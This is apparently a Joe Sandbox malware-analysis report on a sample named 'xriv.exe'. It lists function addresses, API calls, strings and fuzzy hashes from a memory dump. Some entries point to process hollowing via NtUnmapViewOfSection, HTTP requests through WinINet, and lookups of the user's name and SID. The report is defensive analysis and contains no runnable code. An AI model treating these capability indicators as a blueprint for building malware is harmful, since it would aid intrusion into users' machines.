Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1522589568
Opcode ID: ba8ce3c0d5cf43bbd4438679f1c1f9bb44d8017d1dd655d3380e8056791975b0
Instruction ID: 99ea4ebc900995e435691401e350c5f2043651f36f06bbb0181ba063c7340c2d
Opcode Fuzzy Hash: ba8ce3c0d5cf43bbd4438679f1c1f9bb44d8017d1dd655d3380e8056791975b0
Instruction Fuzzy Hash: 97513D71A40618EFDB219F54DC89FEAB774FF08701F104095F649EA290D7B2AA94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 008C86E2 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(008F3F6C,00000000,00000000,00000000,00000000), ref: 008C871C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 008C8740
HttpOpenRequestA.WININET(?,00000000), ref: 008C878A
HttpSendRequestA.WININET(?,00000000), ref: 008C884A
InternetReadFile.WININET(?,?,000003FF,?), ref: 008C88FC
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 008C89B0
InternetCloseHandle.WININET(?), ref: 008C89D7
InternetCloseHandle.WININET(?), ref: 008C89DF
InternetCloseHandle.WININET(?), ref: 008C89E7

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 195a57731a6e919b74b3d6192c72bc7a793d56843b32a7f9829bd2ff413f9249
Instruction ID: c136c02fe5dfccd05f208249a85fd88668b12767a671045db07f76314007fd62
Opcode Fuzzy Hash: 195a57731a6e919b74b3d6192c72bc7a793d56843b32a7f9829bd2ff413f9249
Instruction Fuzzy Hash: 1DC18FB1A00118DBEB289F28CC88BADBB75FF45314F50829DF509D7291DB75DAC08B96

Uniqueness

Uniqueness Score: -1.00%

Function 008E3C76 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008E3CF8
_free.LIBCMT ref: 008E3D1C
_free.LIBCMT ref: 008E3EA9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008F2620), ref: 008E3EBB
_free.LIBCMT ref: 008E4075

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 30fe002539a3b4fd3087a6304cd0a6c9f8350e45e36abae1887b1db9d74247d2
Instruction ID: a6b8c595a9d7d648f47b68b668db2e7a85f2122ac7df44d326019dc6101000c7
Opcode Fuzzy Hash: 30fe002539a3b4fd3087a6304cd0a6c9f8350e45e36abae1887b1db9d74247d2
Instruction Fuzzy Hash: A6C12671A00285AFDB249F7E8C49ABABBB9FF57310F1401AAE545D7282EB318F41C751

Uniqueness

Uniqueness Score: -1.00%

Function 008D7AFC Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008D7B12

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f506f475ecdb1e301887131b0e5d65f259a07fc1e21448e47f697258d5993ef9
Instruction ID: dee054beaffc8878cc70967ff3bb4fcf41c0775a1e4fbecbd2fbf8c909a0d00f
Opcode Fuzzy Hash: f506f475ecdb1e301887131b0e5d65f259a07fc1e21448e47f697258d5993ef9
Instruction Fuzzy Hash: 9D515CB1914615CFDB25CF69D886BAAB7F0FB48320F248A6AD446EB350E7749900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 008C30E0 Relevance: 27.2, APIs: 18, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 008C3132
GetProcessHeap.KERNEL32(00000008,?), ref: 008C3147
HeapAlloc.KERNEL32(00000000), ref: 008C314A
GetUserNameW.ADVAPI32(00000000,?), ref: 008C3158
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 008C317B
GetProcessHeap.KERNEL32(00000008,?), ref: 008C3186
HeapAlloc.KERNEL32(00000000), ref: 008C3189
GetProcessHeap.KERNEL32(00000008,?), ref: 008C3199
HeapAlloc.KERNEL32(00000000), ref: 008C319C
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 008C31C6
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 008C31D9
GetProcessHeap.KERNEL32(00000000,?), ref: 008C32D5
HeapFree.KERNEL32(00000000), ref: 008C32DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C32E3
HeapFree.KERNEL32(00000000), ref: 008C32E6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C32ED
HeapFree.KERNEL32(00000000), ref: 008C32F0
LocalFree.KERNEL32(00000000), ref: 008C32F5

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 6fa30b74ae0102b9ebfc11b9d46862da903fe1139172d402c32cf9515bc44b1a
Instruction ID: 978df8ec4b000fd1b5158e6698749a90cecb9441901b2712a849fa02f937bb8e
Opcode Fuzzy Hash: 6fa30b74ae0102b9ebfc11b9d46862da903fe1139172d402c32cf9515bc44b1a
Instruction Fuzzy Hash: 8B714DB1D00249AFDF14DFA5DC85FAEBBB8FB48311F10852AE915E7280DB749905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008E16C1 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008E1705

Part of subcall function 008E129E: _free.LIBCMT ref: 008E12BB
Part of subcall function 008E129E: _free.LIBCMT ref: 008E12CD
Part of subcall function 008E129E: _free.LIBCMT ref: 008E12DF
Part of subcall function 008E129E: _free.LIBCMT ref: 008E12F1
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1303
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1315
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1327
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1339
Part of subcall function 008E129E: _free.LIBCMT ref: 008E134B
Part of subcall function 008E129E: _free.LIBCMT ref: 008E135D
Part of subcall function 008E129E: _free.LIBCMT ref: 008E136F
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1381
Part of subcall function 008E129E: _free.LIBCMT ref: 008E1393

_free.LIBCMT ref: 008E16FA

Part of subcall function 008DD653: HeapFree.KERNEL32(00000000,00000000,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?), ref: 008DD669
Part of subcall function 008DD653: GetLastError.KERNEL32(?,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?,?), ref: 008DD67B

_free.LIBCMT ref: 008E171C
_free.LIBCMT ref: 008E1731
_free.LIBCMT ref: 008E173C
_free.LIBCMT ref: 008E175E
_free.LIBCMT ref: 008E1771
_free.LIBCMT ref: 008E177F
_free.LIBCMT ref: 008E178A
_free.LIBCMT ref: 008E17C2
_free.LIBCMT ref: 008E17C9
_free.LIBCMT ref: 008E17E6
_free.LIBCMT ref: 008E17FE

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 36f57c849e5ff6b089d834a16eef8ba389c378065e1a9fe93e389efdbe4ed51a
Instruction ID: 9b1e212b79c5e121eed4a09c1080b0388da36030a9bc85985b3ef6c918e4daf0
Opcode Fuzzy Hash: 36f57c849e5ff6b089d834a16eef8ba389c378065e1a9fe93e389efdbe4ed51a
Instruction Fuzzy Hash: 423158316003449FEF21AA7AEC49B5A73E9FF12B50F10892AE458D7255DF70E980CB95

Uniqueness

Uniqueness Score: -1.00%

Function 008D8BC7 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 008D8CC2
type_info::operator==.LIBVCRUNTIME ref: 008D8CE9
___TypeMatch.LIBVCRUNTIME ref: 008D8DF5
IsInExceptionSpec.LIBVCRUNTIME ref: 008D8ED0
_UnwindNestedFrames.LIBCMT ref: 008D8F57
CallUnexpected.LIBVCRUNTIME ref: 008D8F72

Strings

csm, xrefs: 008D8C6F
csm, xrefs: 008D8C02
csm, xrefs: 008D8D20

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: b7c5af3ca4c6b26f75a2c285fc6a359b862cd822728e77c4debc6fd0417f03ac
Instruction ID: 934903c8283904b0d543fcb344e8c9f2ef16c2abe692a36475adf6ef14d5b218
Opcode Fuzzy Hash: b7c5af3ca4c6b26f75a2c285fc6a359b862cd822728e77c4debc6fd0417f03ac
Instruction Fuzzy Hash: F7C12771800209EBCF29DF98D8819AEBBB6FF14314F14465BE851EB352DB31DA51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008DDE2C Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008DDE42

Part of subcall function 008DD653: HeapFree.KERNEL32(00000000,00000000,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?), ref: 008DD669
Part of subcall function 008DD653: GetLastError.KERNEL32(?,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?,?), ref: 008DD67B

_free.LIBCMT ref: 008DDE4E
_free.LIBCMT ref: 008DDE59
_free.LIBCMT ref: 008DDE64
_free.LIBCMT ref: 008DDE6F
_free.LIBCMT ref: 008DDE7A
_free.LIBCMT ref: 008DDE85
_free.LIBCMT ref: 008DDE90
_free.LIBCMT ref: 008DDE9B
_free.LIBCMT ref: 008DDEA9

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 562fcb4536b7259b584a70781c7835483ba579e870dc058526291fd4185064ac
Instruction ID: a976c6204361cc845f805ef8703ad57e697031ac858cd51bb3f3c28d70f1ccc5
Opcode Fuzzy Hash: 562fcb4536b7259b584a70781c7835483ba579e870dc058526291fd4185064ac
Instruction Fuzzy Hash: 29219876904208AFCB41EF98D841DDE7BB9FF18740F018666B619DB221DB71EA84CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 008E5642 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff506b0d782249979a8c1abffedeaf2e9ec96ed5e2b2cf93773dd3667b174c8f
Instruction ID: 83421e3b7576f3e5dd7c98c4d1cae9e9a94a6d3db59d811dc23d73922525afd1
Opcode Fuzzy Hash: ff506b0d782249979a8c1abffedeaf2e9ec96ed5e2b2cf93773dd3667b174c8f
Instruction Fuzzy Hash: 47C1E070904689DBDB15EFAED880BAEBBB1FF4A318F044159E845DB392CB709941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008E0AD9 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 008E0B03
_free.LIBCMT ref: 008E0BDC
_free.LIBCMT ref: 008E0C09

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 3ca7203d2b194825a021649fbe8e6ac5cbc52d78fc322418bd2a36b0217d5ffa
Instruction ID: 60ba8030d035bb41f3ce3943d70137acb030ecb87f06c6a7a721096eded93be3
Opcode Fuzzy Hash: 3ca7203d2b194825a021649fbe8e6ac5cbc52d78fc322418bd2a36b0217d5ffa
Instruction Fuzzy Hash: DB512970944385AFDB10AF7A9841A6D7BE4FF02714F204B6AE955D7382DBB185C0CF92

Uniqueness

Uniqueness Score: -1.00%

Function 008D8570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008D85A7
___except_validate_context_record.LIBVCRUNTIME ref: 008D85AF
_ValidateLocalCookies.LIBCMT ref: 008D8638
__IsNonwritableInCurrentImage.LIBCMT ref: 008D8663
_ValidateLocalCookies.LIBCMT ref: 008D86B8

Strings

csm, xrefs: 008D864D

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a82504b053b1cccf2cc170b449ec9ba3f84c942a74547ec1a5d8c08efa791287
Instruction ID: b5470abc1f5bfdc45b36fd23fcaf0edb0b1475f1f2b61b846421fdb3dc63a51f
Opcode Fuzzy Hash: a82504b053b1cccf2cc170b449ec9ba3f84c942a74547ec1a5d8c08efa791287
Instruction Fuzzy Hash: 48416134A00219EBCF10DF69D884A9EBBB5FF55324F148256E814DB392DB31DA15CF92

Uniqueness

Uniqueness Score: -1.00%

Function 008DE1FE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 008DE255
ext-ms-, xrefs: 008DE269

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9548cdb7597e2cd1cf788ac61c9879ea0375d22a90153a9357e1243a9fddcfe0
Instruction ID: 3612f0154c8d457fa46fc8e502cb8ce54bf8932868549d7088fe6fd62043d53c
Opcode Fuzzy Hash: 9548cdb7597e2cd1cf788ac61c9879ea0375d22a90153a9357e1243a9fddcfe0
Instruction Fuzzy Hash: B321C072A41625ABEB31AA659C85A5A379CFF55770F240322FD16EF390E630ED00C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 008E143D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E1405: _free.LIBCMT ref: 008E142A

_free.LIBCMT ref: 008E148B

Part of subcall function 008DD653: HeapFree.KERNEL32(00000000,00000000,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?), ref: 008DD669
Part of subcall function 008DD653: GetLastError.KERNEL32(?,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?,?), ref: 008DD67B

_free.LIBCMT ref: 008E1496
_free.LIBCMT ref: 008E14A1
_free.LIBCMT ref: 008E14F5
_free.LIBCMT ref: 008E1500
_free.LIBCMT ref: 008E150B
_free.LIBCMT ref: 008E1516

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
Instruction ID: bd0da303533e5daf0ca9be212ca5189e8e8d8507b3e99d1f149815a3c66d295c
Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
Instruction Fuzzy Hash: 011181B1500748A6D920BF76DC0AFC7779DFF02F04F414816729DEA292D638A54186CA

Uniqueness

Uniqueness Score: -1.00%

Function 008E2AF8 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,008C5140,00000000), ref: 008E2B40
__fassign.LIBCMT ref: 008E2D1F
__fassign.LIBCMT ref: 008E2D3C
WriteFile.KERNEL32(?,008C5140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E2D84
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008E2DC4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 008E2E70

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: aa43aa2a2fbee1eb65b70252ba54b828e710aa1e9a27ca850727f7b3ddb5659a
Instruction ID: 3125669b5cbda53f77c8a9eb92586381b30b4e3e74925ab514df1f1a3e8b4803
Opcode Fuzzy Hash: aa43aa2a2fbee1eb65b70252ba54b828e710aa1e9a27ca850727f7b3ddb5659a
Instruction Fuzzy Hash: 22D17D75D0029D9FCF15CFA9C8809EDBBB9FF49314F28416AE856FB242D630A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008D8890 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008D8887,008D8476,008D7AC4), ref: 008D889E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008D88AC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008D88C5
SetLastError.KERNEL32(00000000,008D8887,008D8476,008D7AC4), ref: 008D8917

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5ae36bd4a880cb22c5b74f346372fb8bb01da180ac2cd34435356d2502ea2275
Instruction ID: f0f81fc3b657be10ee07cfca5936a68c0ff1543654c877158cbc3c8cf3d8061e
Opcode Fuzzy Hash: 5ae36bd4a880cb22c5b74f346372fb8bb01da180ac2cd34435356d2502ea2275
Instruction Fuzzy Hash: 3F01B13361A722EEAB25267A6C85D3A2B98FF417F5720033BF560C47E1FF214804A646

Uniqueness

Uniqueness Score: -1.00%

Function 008E002E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 008E0033

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
API String ID: 0-4106172500
Opcode ID: c21f9d32a2cf94c60c287494ef46c4be3dbc5201253fb62a4a735d8452bd1e1e
Instruction ID: 98f683b5b3a4120c8569f68d25fc73a43cd3c58cc980c915a7343a0eaea23a2c
Opcode Fuzzy Hash: c21f9d32a2cf94c60c287494ef46c4be3dbc5201253fb62a4a735d8452bd1e1e
Instruction Fuzzy Hash: D3210A7150459ABFDB20AF6A8C80E6B77ADFF163647104A25F914D7342DBB1EC808F51

Uniqueness

Uniqueness Score: -1.00%

Function 008DB476 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 008DB4B8

Strings

.cmd, xrefs: 008DB4D6
.exe, xrefs: 008DB4C5
.com, xrefs: 008DB4F8
.bat, xrefs: 008DB4E7

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: e964629ac39a140a29c95b84135540bb73b5841840c777c9b79d66f6173f6e7b
Instruction ID: 3a6d8e50c729033a285bdedf1f304fe9e4fcd2b64e16c2b7ca126e150195d6e8
Opcode Fuzzy Hash: e964629ac39a140a29c95b84135540bb73b5841840c777c9b79d66f6173f6e7b
Instruction Fuzzy Hash: F101C83B614615A55714601EAC02A2717B8FBD3BB0717022BF958FB3C2EF44DD024195

Uniqueness

Uniqueness Score: -1.00%

Function 008D9937 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 008D9987

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
